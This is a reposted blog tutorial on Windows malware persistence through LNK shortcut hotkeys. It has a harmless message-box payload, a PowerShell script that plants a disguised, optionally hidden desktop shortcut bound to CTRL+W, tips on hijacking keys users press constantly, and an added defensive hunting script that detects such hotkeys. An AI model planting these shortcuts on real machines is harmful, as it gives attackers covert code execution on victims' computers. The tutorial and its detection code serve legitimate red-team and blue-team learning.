Malware development: persistence – part 23. LNK files. Simple Powershell example.

Hello, cybersecurity enthusiasts and white-hat hackers!

This post is based on my own research into one of the more interesting malware persistence tricks: via Windows LNK files.

LNK

According to Microsoft, an LNK file is a shortcut, or "link", in Windows: a reference to an original file, folder, or application. For regular users these files are a convenience for organizing files and decluttering the workspace. From an attacker's perspective, though, LNK files take on a different significance: they have been abused in a number of documented APT campaigns and, to my knowledge, remain a viable option for phishing, establishing persistence and executing payloads.

Did you know that a Windows shortcut can have a shortcut key (hotkey) assigned, so that pressing that key combination launches the shortcut's target? That is the trick used for persistence in this case.

practical example

Let's say we have a "malware". As usual, it is the meow-meow message box application, hack.c:

/*
hack.c
evil app for windows persistence
author: @cocomelonc
https://cocomelonc.github.io/malware/2023/12/10/malware-pers-23.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

Then write a PowerShell script that creates an LNK file with the following properties:

# Define the path for the shortcut on the desktop
$shortcutPath = "$([Environment]::GetFolderPath('Desktop'))\Meow.lnk"

# Create a WScript Shell object
$wshell = New-Object -ComObject Wscript.Shell

# Create a shortcut object
$shortcut = $wshell.CreateShortcut($shortcutPath)

# Set the icon location for the shortcut
$shortcut.IconLocation = "C:\Program Files\Windows NT\Accessories\wordpad.exe"

# Set the target path and arguments for the shortcut
$shortcut.TargetPath = "Z:\2023-12-10-malware-pers-23\hack.exe"
$shortcut.Arguments = ""

# Set the working directory for the shortcut
$shortcut.WorkingDirectory = "Z:\2023-12-10-malware-pers-23"

# Set a hotkey for the shortcut (e.g., CTRL+W)
$shortcut.HotKey = "CTRL+W"

# Set a description for the shortcut
$shortcut.Description = "Not malicious, meow-meow malware"

# Set the window style for the shortcut (7 = Minimized window)
$shortcut.WindowStyle = 7

# Save the shortcut
$shortcut.Save()

# Optionally make the link invisible by adding 'Hidden' attribute
# (Get-Item $shortcutPath).Attributes += 'Hidden'

As you can see, the logic is pretty simple: we create a shortcut on the desktop with a hotkey assigned, CTRL+W. In a real attack it could be a combination the victim presses all the time, such as CTRL+C, CTRL+V or CTRL+P. Two caveats a practitioner should keep in mind: Explorer only honours shortcut keys for shortcuts that live on the Desktop or in the Start Menu, so the location is not incidental, and the hotkey is registered system-wide, so the keystroke is consumed by the shortcut and no longer reaches the foreground application (after this script runs, CTRL+W stops closing browser tabs, which a victim may notice).

For comparison, a shortcut to Paint created through Explorer has no shortcut key assigned.

Explorer's Properties dialog restricts which shortcut keys it will assign: typing a letter there yields CTRL+ALT+letter. A plain CTRL+W cannot be set from the dialog and has to be set programmatically through COM, which is exactly what the WScript.Shell shortcut object in the script above does.
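The detection counterpart, added here as an example and not part of the original post or its repository: a hunting script that enumerates .lnk files in the locations where Explorer honours shortcut keys and decodes the HotKey field straight from the ShellLinkHeader as laid out in the MS-SHLLINK specification referenced below (HeaderSize 0x4C, the ShellLink CLSID, HotKeyFlags at offset 0x40: low byte virtual-key code, high byte modifier bits 0x01 SHIFT, 0x02 CTRL, 0x04 ALT). Reading the bytes means a suspicious file is inspected without being resolved or launched. The folder list, the function names and the "single modifier means it was written programmatically" heuristic are my own assumptions; the target and argument lookup through WScript.Shell is Windows-only and is skipped elsewhere.

```powershell
# Added example, not code from the original post: hunt for .lnk files carrying a
# HotKey in the places where Explorer honours shortcut keys (per-user and
# all-users Desktop and Start Menu). Offsets and CLSID follow MS-SHLLINK.

$ShellLinkClsid = '00021401-0000-0000-c000-000000000046'

function ConvertFrom-HotKeyFlags {
    # Decode the 2-byte HotKeyFlags field: low byte = virtual-key code,
    # high byte = modifier bits (0x01 SHIFT, 0x02 CTRL, 0x04 ALT).
    param([byte]$VirtualKey, [byte]$Modifiers)
    if ($VirtualKey -eq 0 -and $Modifiers -eq 0) { return $null }   # no hotkey set
    $key = switch ($VirtualKey) {
        { $_ -ge 0x30 -and $_ -le 0x39 } { [string][char]$_ }        # 0-9
        { $_ -ge 0x41 -and $_ -le 0x5A } { [string][char]$_ }        # A-Z
        { $_ -ge 0x70 -and $_ -le 0x87 } { 'F{0}' -f ($_ - 0x6F) }   # F1-F24
        0x90    { 'NUMLOCK' }
        0x91    { 'SCROLL' }
        default { 'VK_0x{0:X2}' -f $_ }
    }
    $parts = @()
    if ($Modifiers -band 0x02) { $parts += 'CTRL' }
    if ($Modifiers -band 0x04) { $parts += 'ALT' }
    if ($Modifiers -band 0x01) { $parts += 'SHIFT' }
    $parts += $key
    return ($parts -join '+')
}

function Get-LnkHotKey {
    # Parse only the fixed ShellLinkHeader; the file is never resolved or run.
    param([Parameter(Mandatory)][string]$Path)
    $b = [System.IO.File]::ReadAllBytes($Path)
    if ($b.Length -lt 0x4C) { return $null }
    if ([BitConverter]::ToUInt32($b, 0) -ne 0x4C) { return $null }   # HeaderSize
    $clsid = [Guid]::new([byte[]]$b[4..19])                           # LinkCLSID
    if ($clsid.ToString() -ne $ShellLinkClsid) { return $null }
    $vk   = $b[0x40]   # HotKeyFlags.LowByte
    $mods = $b[0x41]   # HotKeyFlags.HighByte
    [pscustomobject]@{
        Path           = $Path
        HotKey         = ConvertFrom-HotKeyFlags -VirtualKey $vk -Modifiers $mods
        ShowCommand    = [BitConverter]::ToUInt32($b, 0x3C)   # 7 = SW_SHOWMINNOACTIVE
        # Heuristic (assumption): Explorer's dialog assigns two-modifier combos
        # (default CTRL+ALT) or bare function keys; a single modifier such as
        # plain CTRL+W is a sign the field was written programmatically.
        SingleModifier = ($mods -in 1, 2, 4)
    }
}

function Find-HotKeyShortcuts {
    $roots = @(
        [Environment]::GetFolderPath('Desktop'),
        [Environment]::GetFolderPath('CommonDesktopDirectory'),
        [Environment]::GetFolderPath('StartMenu'),
        [Environment]::GetFolderPath('CommonStartMenu')
    ) | Where-Object { $_ -and (Test-Path -LiteralPath $_) } | Select-Object -Unique

    # WScript.Shell is only available on Windows; $IsWindows exists in pwsh 6+,
    # the $env:OS check covers Windows PowerShell 5.1.
    $wshell = $null
    if ($IsWindows -or $env:OS -eq 'Windows_NT') {
        $wshell = New-Object -ComObject WScript.Shell
    }

    foreach ($root in $roots) {
        Get-ChildItem -LiteralPath $root -Filter *.lnk -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $info = Get-LnkHotKey -Path $_.FullName
            if (-not $info -or -not $info.HotKey) { return }   # skip shortcuts without a hotkey
            if ($wshell) {
                # CreateShortcut on an existing file only reads it; nothing is launched.
                $sc = $wshell.CreateShortcut($_.FullName)
                $info | Add-Member NoteProperty Target    $sc.TargetPath
                $info | Add-Member NoteProperty Arguments $sc.Arguments
            }
            $info
        }
    }
}

Find-HotKeyShortcuts | Format-Table Path, HotKey, SingleModifier, ShowCommand, Target, Arguments -AutoSize
```

Run against the lab machine after pers.ps1, the Meow.lnk on the Desktop is reported with HotKey CTRL+W, SingleModifier True and ShowCommand 7, matching the WindowStyle set in the script above. Any hit with a single modifier, a target outside Program Files, or a minimized window style deserves a look; remediation is simply deleting the shortcut or clearing its HotKey through the same COM property.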

demo

Let's see everything in action. First, compile our "malware":

x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive


To check that it works, run it:

.\hack.exe


Then run our PowerShell script for persistence:

Get-Content pers.ps1 | PowerShell.exe -noprofile -


As a result, the Meow LNK file is created successfully.

Looking at its properties, everything is as expected.

Finally, press CTRL+W to trigger the hotkey.

As you can see, everything worked as expected! =^..^= 🙂

This technique is used in the wild by APT groups such as APT28, APT29 and Kimsuky and by malware families such as Emotet. Honestly, the method is so widespread because it is extremely convenient for deceiving victims.

I hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers' arsenal.

Many thanks to my friend and colleague Anton Kuznetsov, he reminded me of this technique when he presented one of his most amazing talks.

This is a practical case for educational purposes only.

ATT&CK MITRE: T1204.001 (User Execution: Malicious Link); the hotkey persistence itself maps more closely to T1547.009 (Boot or Logon Autostart Execution: Shortcut Modification)

APT28
APT29
Kimsuky
Emotet
MSDN: Shell Link (.LNK) Binary File Format

Malware persistence: part 1

source code in github

Thanks for your time, happy hacking and good bye!

PS. All drawings and screenshots are mine.

Originally published by cocomelonc: Malware development: persistence – part 23. LNK files. Simple Powershell example.

Reposted by admin on December 12, 2023, 2:16 pm.